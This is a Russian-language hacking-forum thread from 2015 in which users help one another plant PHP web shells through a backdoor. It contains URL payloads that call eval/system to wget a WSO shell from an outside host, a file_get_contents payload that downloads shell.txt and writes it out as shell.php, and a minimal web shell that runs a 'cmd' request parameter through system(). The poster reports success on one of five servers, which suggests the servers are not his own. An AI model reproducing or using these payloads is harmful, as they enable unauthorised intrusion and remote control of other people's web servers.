ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.07.2015, 09:11
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
тестирую на своем сервере, на site.ru/ в файл, index.php (или в любой др файл читаемый в браузере) прописываю это бэкдор:
PHP код:
[COLOR="#000000"][CODE][COLOR="#0000BB"]
[/COLOR][/CODE][/COLOR]
не ругайте сильно - учусь... что мне нужно ввести в адресной строке, чтоб загрузить файл на сервер? вариант без использования куков, т е простой вариант есть? знаю, нужно исполнить команду: можно через eval,
типа site.ru/index.php?f=eval.......????
подскажите что ввести в адресной строке для загрузки файла на сервер именно для этого бэкдора, буду каждому благодарен! |
|
|
25.07.2015, 11:06
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
.php?param1=eval¶m2=wget http://site.com/wso.txt -O shell.php
как-то так,возможно вместо eval надо будет писать exec,system и т.д ,использовать кодирование,вместо wget curl |
|
|
|
25.07.2015, 12:19
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Код можно очень сильно сократить
|
|
|
|
25.07.2015, 12:21
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
команда рабочая, спасибо... но работает не всегда, из 5 серверов на один загрузило удачно! на остальные выдает это
Код HTML:
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name in /var/www/u2847619/data/www/adgstroy.ru/index.php on line 3
OK
иногда пишет ОК, по факту на серваке пусто.
права нужные (в загружаемой категории уже лежит рабочий шелл), вариации перебрал exec,system и вместо wget curl... в чем может быть загвоздка? |
|
|
|
25.07.2015, 12:24
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
Сообщение от b3
↑
Код можно очень сильно сократить
да можно знаю, иногда получается с таким вариантом:
Код:
http://site.ru/cashe.php?cmd=$url = "http://ышеу2.ru/data/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);
опять же в меньше половины случаев(
|
|
|
|
25.07.2015, 12:30
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Я имел другое ввиду, ваш код из первого поста можно сократить значительно, а использование eval прям в коде это паливо жестокое
|
|
|
|
25.07.2015, 12:43
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
wget это системная функция, eval-то при чем?
|
|
|
|
25.07.2015, 12:49
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Сообщение от None
Warning: array_filter() expects parameter 2 to be a valid callback, function 'eval' not found or invalid function name
Наверное потому что eval не явлется функцией, а там хз не буду утверждать 100%
|
|
|
|
25.07.2015, 12:51
|
|
Познающий
Регистрация: 16.07.2015
Сообщений: 30
Провел на форуме:
8796
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"cmd"[/COLOR][COLOR="#007700"]]);
echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
die;
}[/COLOR][/COLOR]
|
|
|
|
25.07.2015, 12:57
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
еще один хакер... давайте глупости писать не будем может?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
